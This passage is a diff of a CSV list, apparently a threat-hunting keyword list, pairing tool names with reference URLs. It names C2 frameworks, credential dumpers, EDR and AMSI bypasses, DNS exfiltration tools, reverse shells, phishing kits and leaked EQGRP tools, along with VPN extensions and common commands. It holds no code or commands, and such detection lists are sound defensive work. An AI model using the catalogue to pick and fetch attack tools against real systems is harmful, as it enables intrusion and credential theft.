+"CyberGhost VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"cytool","N/A"
+"D1rkInject","https://github.com/TheD1rkMtr/D1rkInject"
+"Daily VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"DAMP","https://github.com/HarmJ0y/DAMP"
+"daphne","https://github.com/codewhitesec/daphne"
+"darkarmour","https://github.com/bats3c/darkarmour"
+"DarkLoadLibrary","https://github.com/bats3c/DarkLoadLibrary"
+"DarkWidow","https://github.com/reveng007/DarkWidow"
+"datasploit","https://github.com/dvopsway/datasploit"
+"DavRelayUp","https://github.com/ShorSec/DavRelayUp"
+"dazzleUP","https://github.com/hlldz/dazzleUP"
+"DBC2","https://github.com/Arno0x/DBC2"
+"dcipher-cli","https://github.com/k4m4/dcipher-cli"
+"dcomhijack","https://github.com/WKL-Sec/dcomhijack"
+"DCOMPotato","https://github.com/zcgonvh/DCOMPotato"
+"DcRat","https://github.com/qwqdanchun/DcRat"
+"dd","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml"
+"DeathStar","https://github.com/byt3bl33d3r/DeathStar"
+"DebugAmsi","https://github.com/MzHmO/DebugAmsi"
+"debugdfs","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md"
+"decrypt-chrome-passwords","https://github.com/ohyicong/decrypt-chrome-passwords"
+"DEEPRISM VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"DefaultCreds-cheat-sheet","https://github.com/ihebski/DefaultCreds-cheat-sheet"
+"DefenderCheck","https://github.com/rasta-mouse/ThreatCheck"
+"DefenderCheck","https://github.com/matterpreter/DefenderCheck"
+"deimosc2","https://github.com/DeimosC2/DeimosC2"
+"DelegationBOF","https://github.com/IcebreakerSecurity/DelegationBOF"
+"demiguise","https://github.com/nccgroup/demiguise"
+"Dendrobate","https://github.com/FuzzySecurity/Dendrobate"
+"DesertNut","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut"
+"dev-tunnels","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview"
+"DFSCoerce","https://github.com/Wh04m1001/DFSCoerce"
+"dialupass","https://www.nirsoft.net/utils/dialupass.html"
+"dig","https://linux.die.net/man/1/dig"
+"Dinjector","https://github.com/Metro-Holografix/DInjector"
+"dir","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/"
+"dir","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference"
+"dirbuster","https://github.com/vulnersCom/burp-Dirbuster"
+"DirCreate2System","https://github.com/binderlabs/DirCreate2System"
+"Direct-Syscalls","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls"
+"dirscraper","https://github.com/Cillian-Collins/dirscraper"
+"dirsearch","https://github.com/maurosoria/dirsearch"
+"dirtycow","multiple pocs on github and others places "
+"dirty-pipe","https://github.com/0xIronGoat/dirty-pipe"
+"disctopia-c2","https://github.com/3ct0s/disctopia-c2"
+"DiskCryptor","https://github.com/DavidXanatos/DiskCryptor"
+"diskshadow","N/A"
+"DllNotificationInjection","https://github.com/ShorSec/DllNotificationInjection"
+"DllProxy","https://github.com/Iansus/DllProxy/"
+"dns","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml"
+"dnscan","https://github.com/rbsec/dnscan"
+"dnscat","https://github.com/iagox86/dnscat2"
+"dnscat2","https://github.com/iagox86/dnscat2"
+"dnscmd","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
+"dnsdumpster","https://dnsdumpster.com/"
+"dnsenum","https://github.com/fwaeytens/dnsenum"
+"DNSExfiltrator","https://github.com/Arno0x/DNSExfiltrator"
+"dnsmorph","https://github.com/netevert/dnsmorph"
+"DNS-Persist","https://github.com/0x09AL/DNS-Persist"
+"dnsrecon","https://github.com/darkoperator/dnsrecon"
+"dnsteal","https://github.com/m57/dnsteal"
+"DNSTracer","https://github.com/pcoder/DNSTracer"
+"dnstwist","https://github.com/elceef/dnstwist"
+"DockerPwn","https://github.com/AbsoZed/DockerPwn.py"
+"DocPlz","https://github.com/TheD1rkMtr/DocPlz"
+"DoHC2","https://github.com/SpiderLabs/DoHC2"
+"domain_analyzer","https://github.com/eldraco/domain_analyzer"
+"domained","https://github.com/TypeError/domained"
+"domainhunter","https://github.com/threatexpress/domainhunter"
+"DomainPasswordSpray","https://github.com/dafthack/DomainPasswordSpray"
+"DOME","https://github.com/v4d1/Dome"
+"donpapi","https://github.com/login-securite/DonPAPI"
+"donut","https://github.com/TheWover/donut"
+"dos-over-tor","https://github.com/skizap/dos-over-tor"
+"DotVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"DoubleAgent","https://github.com/Cybellum/DoubleAgent"
+"dpapi.py","N/A"
+"dploot","https://github.com/zblurx/dploot"
+"Dr0p1t-Framework","https://github.com/D4Vinci/Dr0p1t-Framework"
+"DriverQuery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery"
+"Droopscan","https://github.com/droope/droopescan"
+"Drupwn","https://github.com/immunIT/drupwn"
+"dsniff","https://github.com/tecknicaltom/dsniff"
+"dsquery","N/A"
+"dsquery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations"
+"dtd-finder","https://github.com/GoSecure/dtd-finder"
+"ducktail","https://www.trendmicro.com/en_be/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html"
+"ducky","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki"
+"DueDLLigence","https://github.com/mandiant/DueDLLigence"
+"DumpCreds","https://github.com/ponypot/dumpcreds"
+"Dumpert","https://github.com/outflanknl/Dumpert"
+"DumpsterFire","https://github.com/TryCatchHCF/DumpsterFire"
+"EAPHammer","https://github.com/s0lst1c3/eaphammer"
+"Earth Lusca Operations Tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf"
+"Earth Lusca Operations Tools ","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon"
+"Earth Lusca Operations Tools 
","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1"
+"Earth Lusca Operations Tools ","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato"
+"Earth Lusca Operations Tools ","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc"
+"Earth VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Ebowla","https://github.com/Genetic-Malware/Ebowla"
+"echo","N/A"
+"echo","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/"
+"echo","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml"
+"echoac-poc","https://github.com/kite03/echoac-poc"
+"EDRaser","https://github.com/SafeBreach-Labs/EDRaser"
+"EDRSandBlast","https://github.com/wavestone-cdt/EDRSandblast"
+"EDRSandblast-GodFault","https://github.com/gabriellandau/EDRSandblast-GodFault"
+"EDR-Test","https://github.com/TH3xACE/EDR-Test"
+"EfsPotato","https://github.com/zcgonvh/EfsPotato"
+"Eggshell","https://github.com/neoneggplant/EggShell"
+"Egress-Assess","https://github.com/FortyNorthSecurity/Egress-Assess"
+"egressbuster","https://github.com/trustedsec/egressbuster"
+"elastic-agent","N/A"
+"elevationstation","https://github.com/g3tsyst3m/elevationstation"
+"elite-proxy-finder","https://github.com/DanMcInerney/elite-proxy-finder"
+"EmailAll","https://github.com/Taonn/EmailAll"
+"email-format","https://www.email-format.com"
+"EmbedInHTML","https://github.com/Arno0x/EmbedInHTML"
+"empire","https://github.com/EmpireProject/Empire-GUI"
+"empire","https://github.com/PowerShellEmpire/PowerTools"
+"empire","https://www.powershellempire.com/"
+"empire","https://github.com/BC-SECURITY/Empire"
+"empire","https://github.com/BC-SECURITY/Starkiller"
+"empire","https://github.com/EmpireProject/Empire"
+"EncryptedZIP","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP"
+"enum4linux","https://github.com/CiscoCXSecurity/enum4linux"
+"EQGR","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON"
+"EQGR","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt"
+"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386"
+"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py"
+"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON"
+"EQGRP tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin"
+"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/user.tool.elatedmonkey"
+"EQGRP tools","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1"
+"EQGRP tools","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner"
+"EQGRP tools","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON"
+"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker"
+"EQGRP tools","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS"
+"Eternalblue-Doublepulsar-Metasploit","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit"
+"EternalHushFramework","https://github.com/APT64/EternalHushFramework"
+"ETW","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503"
+"ETWEventSubscription","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription"
+"ETWHash","https://github.com/nettitude/ETWHash"
+"EventViewer-UACBypass","https://github.com/CsEnox/EventViewer-UACBypass"
+"EvilClippy","https://github.com/outflanknl/EvilClippy"
+"evilginx","https://github.com/kgretzky/evilginx2"
+"evilginx2","https://github.com/kgretzky/evilginx2"
+"evilgrade","https://github.com/infobyte/evilgrade"
+"EvilLsassTwin","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin"
+"EvilnoVNC","https://github.com/JoelGMSec/EvilnoVNC"
+"evilqr","https://github.com/kgretzky/evilqr"
+"evil-winrm","https://github.com/Hackplayers/evil-winrm"
+"EvtMute","https://github.com/bats3c/EvtMute"
+"Excel","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml"
+"Excel-Exploit","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main"
+"exe_to_dll","https://github.com/hasherezade/exe_to_dll"
+"exe2powershell","https://github.com/yanncam/exe2powershell"
+"Executable_Files","https://github.com/reveng007/Executable_Files"
+"exegol","https://github.com/ThePorgs/Exegol"
+"expl-bin","https://github.com/sailay1996/expl-bin"
+"exploits","https://github.com/XiphosResearch/exploits"
+"Exploits","https://github.com/WindowsExploits/Exploits"
+"export","N/A"
+"ExpressVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Exrop","https://github.com/d4em0n/exrop"
+"ExtractBitlockerKeys","https://github.com/p0dalirius/ExtractBitlockerKeys"
+"EyeWitness","https://github.com/FortyNorthSecurity/EyeWitness"
+"FakeAMSI","https://github.com/gtworek/PSBits/tree/master/FakeAMSI"
+"FakeCmdLine","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine"
+"FakeImageExploiter","https://github.com/r00t-3xp10it/FakeImageExploiter"
+"fakelogonscreen","https://github.com/bitsadmin/fakelogonscreen"
+"fake-sms","https://github.com/Narasimha1997/fake-sms"
+"Farmer","https://github.com/mdsecactivebreach/Farmer"
+"FastestVPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"fastfuzz","https://github.com/tismayil/fastfuz-chrome-ext"
+"FastStunnel VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"fcrackzip","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html"
+"ffuf","https://github.com/ffuf/ffuf"
+"fgdump","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump"
+"FiercePhish","https://github.com/Raikia/FiercePhish"
+"file.io","https://twitter.com/mthcht/status/1660953897622544384"
+"fileless-elf-exec","https://github.com/nnsee/fileless-elf-exec"
+"FilelessPELoader","https://github.com/TheD1rkMtr/FilelessPELoader"
+"find","N/A"
+"find","https://github.com/ice-wzl/wmiexec2"
+"find","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/"
+"Findsploit","https://github.com/1N3/Findsploit"
+"findstr","N/A"
+"findstr","https://github.com/gabriellandau/PPLFault"
+"findsubdomains","https://findsubdomains.com/"
+"FindUncommonShares","https://github.com/p0dalirius/FindUncommonShares"
+"firefox_decrypt","https://github.com/unode/firefox_decrypt"
+"firesheep","https://codebutler.github.io/firesheep/"
+"FlipperZero","https://docs.flipper.net/qflipper/windows-debug"
+"fltMC","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1"
+"FluxionNetwork","https://github.com/FluxionNetwork/fluxion"
+"FMFASweep","https://github.com/dafthack/MFASweep"
+"FOCA","https://github.com/ElevenPaths/FOCA"
+"ForgeCert","https://github.com/GhostPack/ForgeCert"
+"forkatz","https://github.com/Barbarisch/forkatz"
+"Fornex VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"FourEye","https://github.com/lengjibo/FourEye"
+"FoxyProxy Standard","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"frampton","https://github.com/ins1gn1a/Frampton"
+"Free Avira Phantom VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Free Fast VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Free One Touch VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Free Proxy VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Free Residential VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Free VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"FREE VPN DEWELOPMENT","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"Free VPN for 
Chrome","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"freefilesync","https://freefilesync.org/download.php"
+"Freeze","https://github.com/optiv/Freeze"
+"Freeze.rs","https://github.com/optiv/Freeze.rs"
+"ftype","N/A"
+"Fuck-Etw","https://github.com/unkvolism/Fuck-Etw"
+"FudgeC2","https://github.com/Ziconius/FudgeC2"
+"FunctionalC2","https://github.com/FortyNorthSecurity/FunctionalC2"
+"fuxploider","https://github.com/almandin/fuxploider"
+"fuzz.txt","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt"
+"fuzzdb","https://github.com/fuzzdb-project/fuzzdb"
+"GadgetToJScript","https://github.com/med0x2e/GadgetToJScript"
+"gateway-finder-imp","https://github.com/whitel1st/gateway-finder-imp"
+"GatherContacts","https://github.com/clr2of8/GatherContacts"
+"gato","https://github.com/praetorian-inc/gato"
+"GC2-sheet","https://github.com/looCiprian/GC2-sheet"
+"gcat","https://github.com/byt3bl33d3r/gcat"
+"GCPBucketBrute","https://github.com/RhinoSecurityLabs/GCPBucketBrute"
+"GCR-Google-Calendar-RAT","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT"
+"Generate-Macro","https://github.com/enigma0x3/Generate-Macro"
+"genHTA","https://github.com/mdsecactivebreach/genHTA"
+"GeoProxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml"
+"getcap","N/A"
+"Getcap","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md"
+"getent","N/A"
+"getExploit","https://github.com/Gioyik/getExploit"
+"Get-RBCD-Threaded","https://github.com/FatRodzianko/Get-RBCD-Threaded"
+"getsploit","https://github.com/vulnersCom/getsploit"
+"ghidra","https://github.com/NationalSecurityAgency/ghidra"
+"GhostInTheNet","https://github.com/cryptolok/GhostInTheNet"
+"GhostPack","https://github.com/GhostPack"
+"Ghostpack-CompiledBinaries","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries"
+"gimmecredz","https://github.com/0xmitsurugi/gimmecredz"
+"gimmeSH","https://github.com/A3h1nt/gimmeSH"
+"github","https://github.com/"
+"Github Username","https://github.com/SecureAuthCorp"
+"Github Username","https://github.com/SpiderLabs"
+"Github Username","https://github.com/0x00-0x00"
+"Github Username","https://github.com/RhinoSecurityLabs"
+"Github Username","https://github.com/realgam3"
+"Github Username","https://github.com/RedTeamOperations"
+"Github Username","https://github.com/rasta-mouse"
+"Github Username","https://github.com/quickbreach"
+"Github Username","https://github.com/r00t-3xp10it"
+"Github Username","https://github.com/s0lst1c3"
+"Github Username","https://github.com/sailay1996"
+"Github Username","https://github.com/sc0tfree"
+"Github Username","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell"
+"Github Username","https://github.com/s0md3v"
+"Github Username","https://github.com/S3cur3Th1sSh1t"
+"Github Username","https://github.com/pentestmonkey"
+"Github Username","https://github.com/mwrlabs"
+"Github Username","https://github.com/n1nj4sec"
+"Github Username","https://github.com/Mr-Un1k0d3r"
+"Github Username","https://github.com/mogwailabs"
+"Github Username","https://github.com/MooseDojo"
+"Github Username","https://github.com/nccgroup"
+"Github Username","https://github.com/obscuritylabs"
+"Github Username","https://github.com/P0cL4bs"
+"Github Username","https://github.com/nyxgeek"
+"Github Username","https://github.com/neoneggplant"
+"Github Username","https://github.com/NextronSystems"
+"Github Username","https://github.com/Screetsec"
+"Github Username","https://github.com/virajkulkarni14"
+"Github Username","https://github.com/Viralmaniar"
+"Github Username","https://github.com/unixpickle"
+"Github Username","https://github.com/TryCatchHCF"
+"Github Username","https://github.com/Und3rf10w"
+"Github 
Username","https://github.com/vysecurity"
+"Github Username","https://github.com/xoreaxeaxeax"
+"Github Username","https://twitter.com/Cneelis"
+"Github Username","https://github.com/xillwillx"
+"Github Username","https://github.com/x0rz"
+"Github Username","https://github.com/x90skysn3k"
+"Github Username","https://github.com/trustedsec"
+"Github Username","https://github.com/SecWiki/windows-kernel-exploits"
+"Github Username","https://github.com/sensepost"
+"Github Username","https://github.com/securitywithoutborders"
+"Github Username","https://github.com/secgroundzero"
+"Github Username","https://github.com/secrary"
+"Github Username","https://github.com/SilverPoision"
+"Github Username","https://github.com/toolswatch/blackhat-arsenal-tools"
+"Github Username","https://github.com/True-Demon"
+"Github Username","https://github.com/tiagorlampert"
+"Github Username","https://github.com/SySS-Research"
+"Github Username","https://github.com/threatexpress"
+"Github Username","https://github.com/Cybellum"
+"Github Username","https://github.com/CyDefUnicorn"
+"Github Username","https://github.com/curi0usJack"
+"Github Username","https://github.com/Coalfire-Research"
+"Github Username","https://github.com/cryptolok"
+"Github Username","https://github.com/D4Vinci/"
+"Github Username","https://github.com/deepzec"
+"Github Username","https://github.com/DominicBreuker"
+"Github Username","https://github.com/dchrastil"
+"Github Username","https://github.com/dafthack"
+"Github Username","https://github.com/danielbohannon"
+"Github Username","https://github.com/Cn33liz"
+"Github Username","https://github.com/BastilleResearch"
+"Github Username","https://github.com/BC-SECURITY"
+"Github Username","https://github.com/attackercan/"
+"Github Username","https://github.com/aboul3la"
+"Github Username","https://github.com/Arno0x"
+"Github Username","https://github.com/Ben0xA"
+"Github Username","https://github.com/byt3bl33d3r"
+"Github Username","https://github.com/chrisk44/Hijacker"
+"Github Username","https://github.com/Bo0oM" +"Github Username","https://github.com/berzerk0" +"Github Username","https://github.com/BishopFox" +"Github Username","https://github.com/enigma0x3" +"Github Username","https://github.com/klsecservices/s7scan" +"Github Username","https://github.com/lanjelot" +"Github Username","https://github.com/klsecservices" +"Github Username","https://github.com/kgretzky" +"Github Username","https://github.com/khast3x" +"Github Username","https://github.com/leapsecurity" +"Github Username","https://github.com/matterpreter" +"Github Username","https://github.com/mdsecactivebreach/" +"Github Username","https://github.com/m8r0wn" +"Github Username","https://github.com/LordNoteworthy" +"Github Username","https://github.com/m4ll0k" +"Github Username","https://github.com/JPCERTCC" +"Github Username","https://github.com/GoSecure" +"Github Username","https://github.com/h0nus" +"Github Username","https://github.com/g0tmi1k" +"Github Username","https://github.com/evilsocket" +"Github Username","https://github.com/FortyNorthSecurity" +"Github Username","https://github.com/Hack-with-Github" +"Github Username","https://github.com/itsKindred" +"Github Username","https://github.com/jedisct1" +"Github Username","https://github.com/Invoke-IR" +"Github Username","https://github.com/HarmJ0y" +"Github Username","https://github.com/hlldz" +"GithubC2","https://github.com/TheD1rkMtr/GithubC2" +"Gitleaks","https://github.com/zricethezav/gitleaks" +"Git-Scanner","https://github.com/HightechSec/git-scanner" +"GIUDA","https://github.com/foxlox/GIUDA" +"glit","https://github.com/shadawck/glit" +"gMSADumper","https://github.com/micahvandeusen/gMSADumper" +"GMSAPasswordReader","https://github.com/rvazarkar/GMSAPasswordReader" +"gobfuscate","https://github.com/unixpickle/gobfuscate" +"gobuster","https://github.com/OJ/gobuster" +"gocrack","https://github.com/mandiant/gocrack" +"godoh","https://github.com/sensepost/godoh" 
+"godpotato","https://github.com/BeichenDream/GodPotato" +"GoFetch","https://github.com/GoFetchAD/GoFetch" +"golang_c2","https://github.com/m00zh33/golang_c2" +"GoldenGMSA","https://github.com/Semperis/GoldenGMSA" +"Gom VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"goMatrixC2","https://github.com/n1k7l4i/goMatrixC2" +"GONET-Scanner","https://github.com/luijait/GONET-Scanner" +"GooDork","https://github.com/k3170makan/GooDork" +"Goodsync","https://www.goodsync.com/" +"goPassGen","https://github.com/bigb0sss/goPassGen" +"gophish","https://github.com/puzzlepeaches/sneaky_gophish/" +"gophish","https://github.com/gophish/gophish" +"gophish","https://github.com/fin3ss3g0d/evilgophish" +"Gorsair","https://github.com/Ullaakut/Gorsair" +"go-secdump","https://github.com/jfjallid/go-secdump" +"gost","https://github.com/ginuerzh/gost" +"Gotato","https://github.com/iammaguire/Gotato" +"goZulipC2","https://github.com/n1k7l4i/goZulipC2" +"gpg","N/A" +"GPOddity","https://github.com/synacktiv/GPOddity" +"gpp-decrypt","https://gitlab.com/kalilinux/packages/gpp-decrypt" +"GPSCoordinates","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates" +"GreatSCT","https://github.com/GreatSCT/GreatSCT" +"Greenwolf","https://github.com/Greenwolf/social_mapper" +"grep","https://gtfobins.github.io/" +"grep","N/A" +"grep","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" +"grep","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"Group3r","https://github.com/Group3r/Group3r" +"gtfobins","https://gtfobins.github.io/" +"GTFOBLookup","https://github.com/nccgroup/GTFOBLookup" +"Guru VPN & Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"h8mail","https://github.com/opencubicles/h8mail" 
+"h8mail","https://github.com/khast3x/h8mail" +"HackBrowserData","https://github.com/moonD4rk/HackBrowserData" +"hackingtool","https://github.com/Z4nzu/hackingtool" +"HackTheWorld","https://github.com/stormshadow07/HackTheWorld" +"hack-tools","https://github.com/LasCC/Hack-Tools" +"hades","https://github.com/f1zm0/hades" +"HadesLdr","https://github.com/CognisysGroup/HadesLdr" +"hakrawler","https://github.com/hakluke/hakrawler" +"HardHatC2","https://github.com/DragoQCC/HardHatC2" +"Harvester_OF_SORROW","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt" +"Hash-Buster","https://github.com/s0md3v/Hash-Buster" +"hashcat","https://github.com/hashcat/hashcat" +"hashview","https://github.com/hashview/hashview" +"havoc","https://github.com/its-a-feature/Mythic" +"havoc","https://github.com/HavocFramework/Havoc" +"hcxdumptool","https://github.com/ZerBea/hcxdumptool" +"HeapCrypt","https://github.com/TheD1rkMtr/HeapCrypt" +"HeartBleed","https://github.com/TechnicalMujeeb/HeartBleed" +"HEKATOMB","https://github.com/Processus-Thief/HEKATOMB" +"HellsGate","https://github.com/am0nsec/HellsGate" +"Heroinn","https://github.com/b23r0/Heroinn" +"Hibr2Dmp","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/dump_lsass_by_converting_hiberfil_to_dmp.ps1" +"Hide My IP VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"HideAll VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hideman VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"HideProcess","https://github.com/landhb/HideProcess" +"Hijacker","https://github.com/chrisk44/Hijacker" 
+"HijackHunter","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter" +"history","N/A" +"HMA VPN Proxy Unblocker","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"hoaxshell","https://github.com/t3l3machus/hoaxshell" +"Hola Free VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hola VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"holehe","https://github.com/megadose/holehe" +"HoneypotBuster","https://github.com/JavelinNetworks/HoneypotBuster" +"HookDetector","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector" +"HostRecon","https://github.com/dafthack/HostRecon" +"Hotspot Shield Elite VPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hotspot Shield Free VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Hoxx VPN Proxy","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"hping","https://github.com/antirez/hping" +"hping3","https://github.com/RoseSecurity/Red-Teaming-TTPs" +"HRShell","https://github.com/chrispetrou/HRShell" +"HTMLSmuggler","https://github.com/D00Movenok/HTMLSmuggler" +"htshells","https://github.com/wireghoul/htshells" +"http.server","N/A" 